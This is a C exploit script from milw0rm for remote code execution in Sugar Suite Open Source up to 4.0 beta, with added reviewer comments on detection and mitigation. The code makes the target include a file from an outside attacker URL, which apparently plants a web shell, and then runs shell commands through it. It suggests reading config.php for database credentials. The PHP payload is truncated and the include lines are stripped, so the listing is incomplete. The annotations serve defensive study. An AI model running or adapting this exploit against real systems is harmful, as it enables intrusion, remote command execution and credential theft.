/*
 * gcc -o sugar sugar.c
 *
 * Usage ./sugar [host] [/path/] [site] [cmd]
 *
 * Sugar Suite Open Source <= 4.0 beta remote code execution (c code)
 * coded by: pointslash v.
 * credits: rgod, unitedasia
 *
 * host - hostname (ex: www.sitename.com)
 * path - path (ex: /sugar/ or just / )
 * site - remote location ( ex: http://www.somesite.com/file.txt)
 * cmd  - specify a command ("cat config.php" to see database username & password)
 *
 * example
 * ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a;
 *
 * Put this in your file.txt
 *   [the PHP snippet that stood here is truncated in this copy; only its
 *    tail survives:]
 * "); fclose($fp); ?>
 *
 * ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al
 *
 * HTTP/1.1 200 OK
 * Date: Thu, 08 Dec 2005 12:35:33 GMT
 * Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
 * X-Powered-By: PHP/4.3.10
 * Connection: close
 * Content-Type: text/html
 *
 * Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown
 */

/*
 * Reviewer notes (defensive reading of this listing)
 *
 * Visible behaviour: main() sends two HTTP GET requests to port 80 of [host].
 * The first requests [path]acceptDecline.php with the query parameter
 * beanFiles[1] set to the caller-supplied [site] URL; its response is never
 * read. The second requests [path]pointslash.php?cmd=[cmd] and copies the
 * response to stdout.
 *
 * Presumably the first request causes the application to include the remote
 * file, and that file writes pointslash.php on the server (the surviving
 * fclose($fp) fragment in the header points that way). The PHP body is
 * missing from this copy -- confirm against the original advisory.
 *
 * Detection, from the request strings below:
 *   - access-log entries for acceptDecline.php whose query string carries a
 *     beanFiles[...] parameter, especially one holding an http:// URL;
 *   - requests for a pointslash.php with a cmd= parameter, or a file of that
 *     name appearing in the application directory;
 *   - the hard-coded User-Agent values "MantraAgent" and "Vagabondo/2.0 MT"
 *     (weak indicators: they are plain string constants);
 *   - outbound HTTP fetches initiated by the web server itself.
 *
 * Mitigation:
 *   - run a release newer than the affected range the header states
 *     (<= 4.0 beta);
 *   - PHP only includes an http:// URL when allow_url_fopen is enabled;
 *     presumably the request can set beanFiles only when register_globals
 *     is on -- TODO confirm against the vendor advisory;
 *   - deny the web-server account write access to the application tree and
 *     block its outbound HTTP where the application does not need it.
 */

/* NOTE(review): the header names (the <...> part) of these eight includes
 * were lost when the page was extracted; the listing does not compile as
 * shown. */
#include
#include
#include
#include
#include
#include
#include
#include

#define HTTP_PORT 80
/* Usage epilogue printed by main(). It is used as a printf-style format, so
 * "%%" stands for a literal '%'. The PHP snippet it once carried is truncated
 * in this copy. */
#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n\");\nfclose($fp);\n?>\n\n"

/****************** MAIN *********************/

void sendpacket(char buffer[8192], int p, char host[100]);

/*
 * main - build the two HTTP requests from the command line and send them.
 *
 * argv[1] = host, argv[2] = path, argv[3] = remote file URL, argv[4] = cmd.
 * With fewer than four arguments it prints the usage text and exits with 1.
 */
int main( int argc, char **argv)
{
    char buffer[8192];
    int count;      /* NOTE(review): never assigned in main, yet returned below */
    char data[190];

    if(argc<5)
    {
        printf("Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source <= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n",argv[0]);
        printf("host - hostname (ex:www.sitename.com)\n");
        printf("path - path (ex: /sugar/ or just / )\n");
        printf("site - remote location ( ex: http://www.somesite.com/file.txt)\n");
        printf("cmd - specify a command (\"cat config.php\" to see database username & password)\n");
        /* NOTE(review): unbounded sprintf into a 190-byte array, then the
         * result is passed to printf as the format string. After the first
         * pass "%%20" has become "%20", so the second pass parses it as a
         * conversion specification. */
        sprintf(data, DATA);
        printf(data);
        exit(1);
    }

    /* Request 1: acceptDecline.php with beanFiles[1] = argv[3]. Sent with
     * p == 0, so the response is not read.
     * NOTE(review): sprintf does not bound argv[] against the 8192-byte
     * buffer. */
    sprintf( buffer, "GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n", argv[2], argv[3], argv[1]);
    sendpacket(buffer,0,argv[1]);

    /* Request 2: pointslash.php?cmd=argv[4]. Sent with p == 1, so the
     * response is echoed to stdout. */
    sprintf( buffer, "GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n", argv[2], argv[4], argv[1]);
    sendpacket(buffer,1,argv[1]);

    return count;   /* indeterminate value: the exit status is not meaningful */
}

/*
 * sendpacket - connect to host on HTTP_PORT over TCP, send buffer, and
 * optionally echo the reply.
 *
 * buffer: NUL-terminated request text (its length is taken with strlen);
 *         reused as the receive buffer when p == 1.
 * p:      1 copies the server's reply to stdout (fd 1); any other value
 *         sends the request and closes without reading.
 * host:   name handed to gethostbyname().
 *
 * Calls exit(1) when socket creation, name lookup, or connect fails.
 * The return value of send() is not checked.
 */
void sendpacket(char buffer[8192], int p, char host[100])
{
    struct sockaddr_in server;
    struct hostent *host_info;
    unsigned long addr;     /* unused */
    int sock;
    char dat[8192];         /* unused */
    int count;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror( "failed to create socket");
        exit(1);
    }

    /* Build the server's socket address:
     * address family, IP address and port number */
    memset( &server, 0, sizeof (server));

    /* resolve the server name to an IP address */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, "unknown server: %s\n", host);
        exit(1);
    }
    memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length);
    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);

    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
        perror( "can't connect to server");
        exit(1);
    }

    send( sock, buffer, strlen( buffer), 0);

    /* read the server's answer and copy it to stdout */
    if (p==1) {
        do {
            /* NOTE(review): buffer is a parameter, so despite the [8192] in
             * its declaration sizeof(buffer) is the size of a char pointer;
             * each recv() asks for only that many bytes. write() is also
             * called with the final count (0 at end of stream, -1 on
             * error). */
            count = recv( sock, buffer, sizeof(buffer), 0);
            write( 1, buffer, count);
        } while (count > 0);
    }

    /* close the connection to the server */
    close ( sock);
}

// milw0rm.com [2005-12-08]